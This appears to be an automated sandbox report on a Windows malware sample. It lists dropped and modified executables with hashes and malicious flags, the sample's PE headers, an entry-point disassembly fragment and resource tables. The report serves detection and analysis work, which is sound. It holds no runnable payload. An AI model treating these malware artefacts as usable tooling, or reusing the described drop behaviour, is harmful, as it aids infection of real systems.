                                                                                                                                                                                                                                                                                                                                SHA-512:956D9B9B092B030D99ED6FF9673A0C132FF0565BD80C7AC63BFAC1E3D80062BC641585776BA0D86E2F39DF0D2CDD6DED403979E9CAA65BBB42EC01A0D4106459
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................d...........p............@..............................................@...............................%..................................................................................................................CODE....(c.......d.................. ..`DATA.................h..............@...BSS..................z...................idata...%.......&...z..............@....tls.....................................rdata..............................@..P.reloc.............................@..P.rsrc...............................@..P.....................H..............@..P........................................................................................................................................
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmp
                                                                                                                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):4096
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.026670007889822
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:48:ivuz1hEU3FR/pmqBl8/QMCBaquEMx5BC+SS4k+bkguj0KHc:bz1eEFNcqBC/Qrex5iSKDkc
                                                                                                                                                                                                                                                                                                                                MD5:0EE914C6F0BB93996C75941E1AD629C6
                                                                                                                                                                                                                                                                                                                                SHA1:12E2CB05506EE3E82046C41510F39A258A5E5549
                                                                                                                                                                                                                                                                                                                                SHA-256:4DC09BAC0613590F1FAC8771D18AF5BE25A1E1CB8FDBF4031AA364F3057E74A2
                                                                                                                                                                                                                                                                                                                                SHA-512:A899519E78125C69DC40F7E371310516CF8FAA69E3B3FF747E0DDF461F34E50A9FF331AB53B4D07BB45465039E8EBA2EE4684B3EE56987977AE8C7721751F5F9
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.....................H................|.......|.......|......Rich............PE..L....M;J..................................... ....@..........................@..............................................l ..P....0..@............................................................................ ..D............................text............................... ..`.rdata....... ......................@..@.rsrc...@....0......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmp
                                                                                                                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):2560
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):2.8818118453929262
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:24:e1GSgDIX566lIB6SXvVmMPUjvhBrDsqZ:SgDKRlVImgUNBsG
                                                                                                                                                                                                                                                                                                                                MD5:A69559718AB506675E907FE49DEB71E9
                                                                                                                                                                                                                                                                                                                                SHA1:BC8F404FFDB1960B50C12FF9413C893B56F2E36F
                                                                                                                                                                                                                                                                                                                                SHA-256:2F6294F9AA09F59A574B5DCD33BE54E16B39377984F3D5658CDA44950FA0F8FC
                                                                                                                                                                                                                                                                                                                                SHA-512:E52E0AA7FE3F79E36330C455D944653D449BA05B2F9ABEE0914A0910C3452CFA679A40441F9AC696B3CCF9445CBB85095747E86153402FC362BB30AC08249A63
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........W.c.W.c.W.c...>.T.c.W.b.V.c.R.<.V.c.R.?.V.c.R.9.V.c.RichW.c.........................PE..L....b.@...........!......................... ...............................@......................................p ..}.... ..(............................0....................................................... ...............................text............................... ..`.rdata....... ......................@..@.reloc.......0......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmp
                                                                                                                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):13312
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):5.745960477552938
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:384:BXvhMwoSitz/bjx7yxnbdn+EHvbsHoOODCg:BZ7FEAbd+EDsIO
                                                                                                                                                                                                                                                                                                                                MD5:A813D18268AFFD4763DDE940246DC7E5
                                                                                                                                                                                                                                                                                                                                SHA1:C7366E1FD925C17CC6068001BD38EAEF5B42852F
                                                                                                                                                                                                                                                                                                                                SHA-256:E19781AABE466DD8779CB9C8FA41BBB73375447066BB34E876CF388A6ED63C64
                                                                                                                                                                                                                                                                                                                                SHA-512:B310ED4CD2E94381C00A6A370FCB7CC867EBE425D705B69CAAAAFFDAFBAB91F72D357966916053E72E68ECF712F2AF7585500C58BB53EC3E1D539179FCB45FB4
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........I...(...(...(..n ..(...(...(...$..(...$..(...$..(..Rich.(..................PE..L......B...........!..... ..........p........0....P..........................P.......................................;.......;..(............................@.......0...............................................0...............................text............ .................. ..`.rdata.......0.......$..............@..@.reloc.......@.......2..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmp
                                                                                                                                                                                                                                                                                                                                File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):6144
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.215994423157539
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12pS5SKvkc:sfJEVYlvxaX12EF
                                                                                                                                                                                                                                                                                                                                MD5:4FF75F505FDDCC6A9AE62216446205D9
                                                                                                                                                                                                                                                                                                                                SHA1:EFE32D504CE72F32E92DCF01AA2752B04D81A342
                                                                                                                                                                                                                                                                                                                                SHA-256:A4C86FC4836AC728D7BD96E7915090FD59521A9E74F1D06EF8E5A47C8695FD81
                                                                                                                                                                                                                                                                                                                                SHA-512:BA0469851438212D19906D6DA8C4AE95FF1C0711A095D9F21F13530A6B8B21C3ACBB0FF55EDB8A35B41C1A9A342F5D3421C00BA395BC13BB1EF5902B979CE824
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d...XW:J..........#............................@.............................`..............................................................<!.......P..@....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...@....P......................@..@................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmp
                                                                                                                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):23312
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.596242908851566
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:384:+Vm08QoKkiWZ76UJuP71W55iWHHoSHigH2euwsHTGHVb+VHHmnH+aHjHqLHxmoq1:2m08QotiCjJuPGw4
                                                                                                                                                                                                                                                                                                                                MD5:92DC6EF532FBB4A5C3201469A5B5EB63
                                                                                                                                                                                                                                                                                                                                SHA1:3E89FF837147C16B4E41C30D6C796374E0B8E62C
                                                                                                                                                                                                                                                                                                                                SHA-256:9884E9D1B4F8A873CCBD81F8AD0AE257776D2348D027D811A56475E028360D87
                                                                                                                                                                                                                                                                                                                                SHA-512:9908E573921D5DBC3454A1C0A6C969AB8A81CC2E8B5385391D46B1A738FB06A76AA3282E0E58D0D2FFA6F27C85668CD5178E1500B8A39B1BBAE04366AE6A86D3
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......IzJ^..$...$...$...%.".$.T87...$.[."...$...$...$.Rich..$.........................PE..L.....\;...........#..... ...4.......'.......0.....q....................................................................k...l)..<....@.../...................p..T....................................................................................text...{........ .................. ..`.data...\....0.......&..............@....rsrc..../...@...0...(..............@..@.reloc.......p.......X..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\FC24.exe
                                                                                                                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):704000
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):6.498036046725285
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:12288:kRObekMSkfohrPUs37uzHnA6zg5cI5MpAHERDjrNyTeR0oUGOHtraxDExyc:WObekrkfohrP337uzHnA6cH+iHEOWUGq
                                                                                                                                                                                                                                                                                                                                MD5:DC768C91E97B42F218028EFA028C41CC
                                                                                                                                                                                                                                                                                                                                SHA1:63E5B917E7EB1FE94707CDE664875B71B247EEB5
                                                                                                                                                                                                                                                                                                                                SHA-256:A0991507C9DA2C3E21DDA334920FC6C36A7FA1595D4C865C6C200C05128F2EFE
                                                                                                                                                                                                                                                                                                                                SHA-512:956D9B9B092B030D99ED6FF9673A0C132FF0565BD80C7AC63BFAC1E3D80062BC641585776BA0D86E2F39DF0D2CDD6DED403979E9CAA65BBB42EC01A0D4106459
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................d...........p............@..............................................@...............................%..................................................................................................................CODE....(c.......d.................. ..`DATA.................h..............@...BSS..................z...................idata...%.......&...z..............@....tls.....................................rdata..............................@..P.reloc.............................@..P.rsrc...............................@..P.....................H..............@..P........................................................................................................................................
                                                                                                                                                                                                                                                                                                                                Process:C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):248887
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):7.999347200465945
                                                                                                                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                                                                                                                SSDEEP:6144:sRxcBD99PawawFfxnCAnTRGqAdE/W4OZNefh4z5MOdF:s+D9JawamrT0h2xg2k5MiF
                                                                                                                                                                                                                                                                                                                                MD5:68E46F802F1407DCB9D851E903298BFD
                                                                                                                                                                                                                                                                                                                                SHA1:F567E0E263BA0414F6E61FAA86C37FD4506A6DE5
                                                                                                                                                                                                                                                                                                                                SHA-256:79AB10EF592B103B642462271F7077ECC8330275376F5634421D5B26AAF280F4
                                                                                                                                                                                                                                                                                                                                SHA-512:FEBC804C5485BC10C089C1F43B3DA2A3A7350DB6DE757389BD795FE81DE48A2BA736E929ABFC55AEC4965B807E41F38AF2320181939879FF323EEE5EC17FFC4F
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:Q.G..!p3..E...:.v.l...q.....8....A.d.>..qm....09...B...j~.s.2.....p.....I..7Et.e..z.......Ui........E..oz}.1U....0z$...._...y].3.}....s!..>[..J......V..X.....O.L.....z...........x.....a..`.."../v.jE%C..].....F.q........./_*.....y...(O[...8...|....s~....&_d3....-V...*....._....H"=g..PQb..a.R...RI.....B..y...x(N.*e..s...1<.^..m1D.=.....66.L..X.y...ym..uW..J.v8....j..~G0.y...5...I.Q5P.......B......^.....w.>r&...X.0....$J.^L\t`..@s'.w..0.z..>].@..r0a....>....9.y...i.&u......x.%....DA..gwj.1...FA)..&.-O...t..x..R:.X..'...C.).S.=.."^.J.?....K..Q_A......7;}G.....2B....gy4.N....!Ie.$.Z.8"3.?.(.F.K...K.r. .!..1y..c.3.Z.Gm.~..0.1..2.....z...8..u.oX.k.<\/..0v.v.`..U.jS..c ..........S.1.W....L....._...U..R@..R.D....`7.G.....L+..tXv.%.Q......D...'.R.Od..NV\..k&v..U...P...hM#.h..+..>.`.#~.....!..!m.zi....`6._.zR....Wh.P.{o..h._.\..l4..^....DN.{..F..I..`...(X..|...J.!W./.;.].1...UtAq..g.a..}.5H/f..1../.....o....]^.O..xg.E.....Tb.2........*&.LT..fFgZ..;.
                                                                                                                                                                                                                                                                                                                                Process:C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                Category:modified
                                                                                                                                                                                                                                                                                                                                Size (bytes):249344
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):6.554987671373836
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3072:9fgWDcLCLpzUhZ4ZmIipZIDqSB5O6AyUoHYYzKnNMX2RFu1aMKwX7jA:V1DcL4Qr2iDIDH+6hsnnNVu1CSj
                                                                                                                                                                                                                                                                                                                                MD5:F98FBCB2A906CCA96365F1D00E6EDEB4
                                                                                                                                                                                                                                                                                                                                SHA1:B4035DC8CE49FCDAA9FB4E893EDFE991C59798F3
                                                                                                                                                                                                                                                                                                                                SHA-256:A8E103DE62FAFFAA06F37726B86C2348C81BE7C7FDE53ABE33A91D0A2BD00BA2
                                                                                                                                                                                                                                                                                                                                SHA-512:4943B036C8B76F85D0CD2F85B4B0BDAE4EB48DEAD636CD52BC18DA79D92C655BCC5A6A8ECFDE87DC6247867EFE12AC1ACF37E91484D5346495C0D70D4F9A388A
                                                                                                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...............................................................................................................PE..L......c......................C......<.......0....@...........................E......+......................................XZ..<.....D..j...........................1...............................M..@............0...............................text............................... ..`.rdata..B3...0...4..................@..@.data...|.B..p.......N..............@....rsrc....j....D..l...b..............@..@........................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                Process:C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):249344
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):6.550095647844565
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3072:56wWDWLCLYz3NqXPICBhHh4e1vEsM6cAKohevmiMRFfo4aMKwX7jA:MlDWLJrIXPICj+e18OcAKXmJg4CSj
                                                                                                                                                                                                                                                                                                                                MD5:82FCA540E2348EAF0F7C70992AC6C98A
                                                                                                                                                                                                                                                                                                                                SHA1:D3D3862992A003AB31A2776D89D563F9527F7BFC
                                                                                                                                                                                                                                                                                                                                SHA-256:BA67C24A22B57B646340C7355E30B1F9F837F472FDB3B701FC0AE10CBC176304
                                                                                                                                                                                                                                                                                                                                SHA-512:99018E8A221E4C4380861B067FB0429E35A3A289D9930A1B3515123DD657B6D064CC11FD9FA6744FB700F160ED506E488753EDD489B33D3C3824C63A14923ACC
                                                                                                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...............................................................................................................PE..L....e.c......................C......<.......0....@...........................E.............................................XZ..<.....D..j...........................1...............................M..@............0...............................text............................... ..`.rdata..B3...0...4..................@..@.data...|.B..p.......N..............@....rsrc....j....D..l...b..............@..@........................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                Process:C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):26
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.95006375643621
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                                                                                                                                                MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                                                                                                                                                SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                                                                                                                                                SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                                                                                                                                                SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                                                                                                Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                                                                                                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):6.550095647844565
                                                                                                                                                                                                                                                                                                                                TrID:
                                                                                                                                                                                                                                                                                                                                • Win32 Executable (generic) a (10002005/4) 99.53%
                                                                                                                                                                                                                                                                                                                                • Win32 EXE PECompact compressed (generic) (41571/9) 0.41%
                                                                                                                                                                                                                                                                                                                                • Clipper DOS Executable (2020/12) 0.02%
                                                                                                                                                                                                                                                                                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                                                                                                                • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                                                                                                                File name:ZRgv8wdMtR.exe
                                                                                                                                                                                                                                                                                                                                File size:249'344 bytes
                                                                                                                                                                                                                                                                                                                                MD5:82fca540e2348eaf0f7c70992ac6c98a
                                                                                                                                                                                                                                                                                                                                SHA1:d3d3862992a003ab31a2776d89d563f9527f7bfc
                                                                                                                                                                                                                                                                                                                                SHA256:ba67c24a22b57b646340c7355e30b1f9f837f472fdb3b701fc0ae10cbc176304
                                                                                                                                                                                                                                                                                                                                SHA512:99018e8a221e4c4380861b067fb0429e35a3a289d9930a1b3515123dd657b6d064cc11fd9fa6744fb700f160ed506e488753edd489b33d3c3824c63a14923acc
                                                                                                                                                                                                                                                                                                                                SSDEEP:3072:56wWDWLCLYz3NqXPICBhHh4e1vEsM6cAKohevmiMRFfo4aMKwX7jA:MlDWLJrIXPICj+e18OcAKXmJg4CSj
                                                                                                                                                                                                                                                                                                                                TLSH:75343B2392F17D90FA62CB729E2ECAE8769EF5504F1977EB12588A1B04B11F2C173711
                                                                                                                                                                                                                                                                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...............................................................................................................PE..L....e.c...........
                                                                                                                                                                                                                                                                                                                                Icon Hash:63796de961436e0f
                                                                                                                                                                                                                                                                                                                                Entrypoint:0x403cda
                                                                                                                                                                                                                                                                                                                                Entrypoint Section:.text
                                                                                                                                                                                                                                                                                                                                Digitally signed:false
                                                                                                                                                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                                                                                                                                                Subsystem:windows gui
                                                                                                                                                                                                                                                                                                                                Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                                                                                                                                DLL Characteristics:NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                                                                                                                Time Stamp:0x638165E1 [Sat Nov 26 01:03:29 2022 UTC]
                                                                                                                                                                                                                                                                                                                                TLS Callbacks:
                                                                                                                                                                                                                                                                                                                                CLR (.Net) Version:
                                                                                                                                                                                                                                                                                                                                OS Version Major:5
                                                                                                                                                                                                                                                                                                                                OS Version Minor:0
                                                                                                                                                                                                                                                                                                                                File Version Major:5
                                                                                                                                                                                                                                                                                                                                File Version Minor:0
                                                                                                                                                                                                                                                                                                                                Subsystem Version Major:5
                                                                                                                                                                                                                                                                                                                                Subsystem Version Minor:0
                                                                                                                                                                                                                                                                                                                                Import Hash:9138bad961b0c12306fd188b3eb186f0
                                                                                                                                                                                                                                                                                                                                Instruction
                                                                                                                                                                                                                                                                                                                                call 00007F42B564C5A2h
                                                                                                                                                                                                                                                                                                                                jmp 00007F42B564945Eh
                                                                                                                                                                                                                                                                                                                                mov edi, edi
                                                                                                                                                                                                                                                                                                                                push ebp
                                                                                                                                                                                                                                                                                                                                mov ebp, esp
                                                                                                                                                                                                                                                                                                                                push ecx
                                                                                                                                                                                                                                                                                                                                push ebx
                                                                                                                                                                                                                                                                                                                                push esi
                                                                                                                                                                                                                                                                                                                                push edi
                                                                                                                                                                                                                                                                                                                                push dword ptr [00847368h]
                                                                                                                                                                                                                                                                                                                                call 00007F42B564BE48h
                                                                                                                                                                                                                                                                                                                                push dword ptr [00847364h]
                                                                                                                                                                                                                                                                                                                                mov edi, eax
                                                                                                                                                                                                                                                                                                                                mov dword ptr [ebp-04h], edi
                                                                                                                                                                                                                                                                                                                                call 00007F42B564BE38h
                                                                                                                                                                                                                                                                                                                                mov esi, eax
                                                                                                                                                                                                                                                                                                                                pop ecx
                                                                                                                                                                                                                                                                                                                                pop ecx
                                                                                                                                                                                                                                                                                                                                cmp esi, edi
                                                                                                                                                                                                                                                                                                                                jc 00007F42B5649669h
                                                                                                                                                                                                                                                                                                                                mov ebx, esi
                                                                                                                                                                                                                                                                                                                                sub ebx, edi
                                                                                                                                                                                                                                                                                                                                lea eax, dword ptr [ebx+04h]
                                                                                                                                                                                                                                                                                                                                cmp eax, 04h
                                                                                                                                                                                                                                                                                                                                jc 00007F42B5649659h
                                                                                                                                                                                                                                                                                                                                push edi
                                                                                                                                                                                                                                                                                                                                call 00007F42B564C6D0h
                                                                                                                                                                                                                                                                                                                                mov edi, eax
                                                                                                                                                                                                                                                                                                                                lea eax, dword ptr [ebx+04h]
                                                                                                                                                                                                                                                                                                                                pop ecx
                                                                                                                                                                                                                                                                                                                                cmp edi, eax
                                                                                                                                                                                                                                                                                                                                jnc 00007F42B564962Ah
                                                                                                                                                                                                                                                                                                                                mov eax, 00000800h
                                                                                                                                                                                                                                                                                                                                cmp edi, eax
                                                                                                                                                                                                                                                                                                                                jnc 00007F42B56495E4h
                                                                                                                                                                                                                                                                                                                                mov eax, edi
                                                                                                                                                                                                                                                                                                                                add eax, edi
                                                                                                                                                                                                                                                                                                                                cmp eax, edi
                                                                                                                                                                                                                                                                                                                                jc 00007F42B56495F1h
                                                                                                                                                                                                                                                                                                                                push eax
                                                                                                                                                                                                                                                                                                                                push dword ptr [ebp-04h]
                                                                                                                                                                                                                                                                                                                                call 00007F42B564C65Eh
                                                                                                                                                                                                                                                                                                                                pop ecx
                                                                                                                                                                                                                                                                                                                                pop ecx
                                                                                                                                                                                                                                                                                                                                test eax, eax
                                                                                                                                                                                                                                                                                                                                jne 00007F42B56495F8h
                                                                                                                                                                                                                                                                                                                                lea eax, dword ptr [edi+10h]
                                                                                                                                                                                                                                                                                                                                cmp eax, edi
                                                                                                                                                                                                                                                                                                                                jc 00007F42B5649622h
                                                                                                                                                                                                                                                                                                                                push eax
                                                                                                                                                                                                                                                                                                                                push dword ptr [ebp-04h]
                                                                                                                                                                                                                                                                                                                                call 00007F42B564C648h
                                                                                                                                                                                                                                                                                                                                pop ecx
                                                                                                                                                                                                                                                                                                                                pop ecx
                                                                                                                                                                                                                                                                                                                                test eax, eax
                                                                                                                                                                                                                                                                                                                                je 00007F42B5649613h
                                                                                                                                                                                                                                                                                                                                sar ebx, 02h
                                                                                                                                                                                                                                                                                                                                push eax
                                                                                                                                                                                                                                                                                                                                lea esi, dword ptr [eax+ebx*4]
                                                                                                                                                                                                                                                                                                                                call 00007F42B564BD53h
                                                                                                                                                                                                                                                                                                                                pop ecx
                                                                                                                                                                                                                                                                                                                                mov dword ptr [00847368h], eax
                                                                                                                                                                                                                                                                                                                                push dword ptr [ebp+08h]
                                                                                                                                                                                                                                                                                                                                call 00007F42B564BD45h
                                                                                                                                                                                                                                                                                                                                mov dword ptr [esi], eax
                                                                                                                                                                                                                                                                                                                                add esi, 04h
                                                                                                                                                                                                                                                                                                                                push esi
                                                                                                                                                                                                                                                                                                                                call 00007F42B564BD3Ah
                                                                                                                                                                                                                                                                                                                                pop ecx
                                                                                                                                                                                                                                                                                                                                mov dword ptr [00847364h], eax
                                                                                                                                                                                                                                                                                                                                mov eax, dword ptr [ebp+08h]
                                                                                                                                                                                                                                                                                                                                pop ecx
                                                                                                                                                                                                                                                                                                                                jmp 00007F42B56495E4h
                                                                                                                                                                                                                                                                                                                                xor eax, eax
                                                                                                                                                                                                                                                                                                                                pop edi
                                                                                                                                                                                                                                                                                                                                pop esi
                                                                                                                                                                                                                                                                                                                                pop ebx
                                                                                                                                                                                                                                                                                                                                leave
                                                                                                                                                                                                                                                                                                                                ret
                                                                                                                                                                                                                                                                                                                                mov edi, edi
                                                                                                                                                                                                                                                                                                                                push esi
                                                                                                                                                                                                                                                                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x25a580x3c.rdata
                                                                                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x4480000x16a18.rsrc
                                                                                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x231d00x1c.rdata
                                                                                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x24df80x40.rdata
                                                                                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_IAT0x230000x188.rdata
                                                                                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                                                                                                                                                                                                NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                                                                                                                .text0x10000x214e20x21600False0.7944683403558053data7.404290778259079IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                                                                                .rdata0x230000x33420x3400False0.3640324519230769OpenPGP Public Key Version 25.235621565938834IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                                                                                .data0x270000x42037c0x1400unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                                                                                                .rsrc0x4480000x16a180x16c00False0.38570999313186816data4.533280404127789IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                                                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                                                                                                                                GUTEHEZIBOVUNO0x4583100x9e7ASCII text, with very long lines (2535), with no line terminatorsPunjabiPakistan0.6031558185404339
                                                                                                                                                                                                                                                                                                                                GUTEHEZIBOVUNO0x4583100x9e7ASCII text, with very long lines (2535), with no line terminatorsPunjabiIndia0.6031558185404339
                                                                                                                                                                                                                                                                                                                                YAGUGAMEKUTIZAGAL0x458cf80x1e31ASCII text, with very long lines (7729), with no line terminatorsPunjabiPakistan0.5864924311036357
                                                                                                                                                                                                                                                                                                                                YAGUGAMEKUTIZAGAL0x458cf80x1e31ASCII text, with very long lines (7729), with no line terminatorsPunjabiIndia0.5864924311036357
                                                                                                                                                                                                                                                                                                                                RT_CURSOR0x45abc00xea8Device independent bitmap graphic, 48 x 96 x 8, image size 00.2953091684434968
                                                                                                                                                                                                                                                                                                                                RT_CURSOR0x45ba680x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 00.46705776173285196
                                                                                                                                                                                                                                                                                                                                RT_CURSOR0x45c3100x568Device independent bitmap graphic, 16 x 32 x 8, image size 00.5361271676300579
                                                                                                                                                                                                                                                                                                                                RT_ICON0x4488700x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0PunjabiPakistan0.5328341013824884
